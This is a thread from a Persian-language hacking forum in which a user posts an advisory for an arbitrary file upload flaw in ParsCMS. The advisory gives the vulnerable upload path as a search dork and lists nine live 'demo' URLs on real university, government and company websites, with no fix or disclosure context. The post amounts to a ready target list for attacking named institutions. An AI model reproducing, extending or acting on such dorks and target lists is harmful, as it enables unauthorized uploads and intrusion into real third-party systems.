انجمن تیم امنیتی ایران سایبر

Parscms - Arbitrary File Upload

شروع موضوع توسط Unkn0wn ‏7/1/20 در انجمن آسیب پذیری های کشف و گزارش شده

  1. لطفا فایل های خود را جهت ماندگاری در انجمن اپلود کنید در صورت مشاهده لینک اپلود خروجی , تاپیک حذف خواهد شد .
    بستن اطلاعیه
بستن اطلاعیه


درود مهمان گرامي؛

مهمان گرامي، براي مشاهده تالار با امکانات کامل ميبايست از طريق ايــن ليـــنک ثبت نام کنيد .

حامی مسابقات و برگزار کننده دوره های پیشرفته ارزیابی امنیت برای سازمان ها فتح پرچم (CTF)
  1. Unkn0wn
    کاربر فعال

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏30/5/18
    ارسال ها:
    113
    تشکر شده:
    591
    جنسیت:
    Name:
    Unknown
    Main os:
    Mac
    کد:
       
    ParsCMS - Arbitrary File Upload
    2020.01.06
    de Unkn0wn (DE)  de
    Risk: High
    Local: No
    Remote: Yes
    CVE: N/A
    CWE: N/A
    Dork: "modules/eform/upload/"
     
     
    ---------------------------------------------------------
    # Exploit Title: ParsCMS - Arbitrary File Upload
    # Google Dork: N/A
    # Date: 2020-01-01
    # Exploit Author: Unkn0wn ([email protected])
    # Vendor Homepage: http://parscms.com/
    # Software Link: private cms
    # Version: 1.0
    # Tested on: Ubuntu
    # CVE : N/A
    ---------------------------------------------------------
    exploit:
    "modules/eform/upload/"
    
    demo:
    http://iauda.ac.ir/modules/eform/upload/
    https://www.msc.ir/modules/eform/upload/
    http://farhangi.tums.ac.ir/en/modules/eform/upload/
    http://old.isipo.ir/modules/eform/upload/
    http://eskordi.com/modules/eform/upload/
    http://pdiaari.tums.ac.ir/modules/eform/upload/
    http://rvp.iauda.ac.ir/modules/eform/upload/
    http://www.rca.gov.ir/modules/eform/upload/
    http://farhangi.tums.ac.ir/en/modules/eform/upload/
    ----------------------------------------------------------
    "Happy new Year 2020"
    # https://Github.com/0x9a
     
    blackops و Ruiner از این پست تشکر کرده اند.
بارگذاری...

کاربرانی که از تاپیک دیدن کرده اند (کل: 15)

  1. duty
  2. Monocots57
  3. 6124
  4. Juaninator
  5. hackerman1
  6. GonzOfficial28
  7. DawnInAllah
  8. Pi.Hack
  9. FuzzyFord
  10. Ruiner
  11. 1314CK.0FF3NSIV3
  12. Enetpropo
  13. Unkn0wn
  14. AliTNT
  15. blackops
به انجمن تخصصی امنیت ایران سایبر خوش آمدید . برای مشاهده تمامی تالار ها و امکانات ثبت نام کنید .